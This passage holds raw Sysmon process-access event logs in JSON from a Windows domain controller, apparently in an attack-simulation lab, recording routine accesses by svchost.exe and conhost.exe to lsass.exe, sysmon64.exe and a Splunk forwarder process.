{"EventTime":"2020-08-01 07:53:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2306,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:33.814\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:33.814","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2307,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:33.814\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:33.814","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2308,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:33.814\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:33.814","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2309,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:33.814\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:33.814","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2310,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:33.814\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:33.814","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2311,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:33.814\r\nSourceProcessGUID: {41C8662E-1F74-5F25-0000-0010C4650300}\r\nSourceProcessId: 3884\r\nSourceThreadId: 3904\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F7D-5F25-0000-0010751D0400}\r\nTargetProcessId: 3920\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:33.814","SourceProcessGUID":"{41C8662E-1F74-5F25-0000-0010C4650300}","SourceProcessId":"3884","SourceThreadId":"3904","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F7D-5F25-0000-0010751D0400}","TargetProcessId":"3920","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-perfmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2312,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:33.955\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:33.955","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2313,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:33.955\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:33.955","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:35","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:33","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2314,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:33.955\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 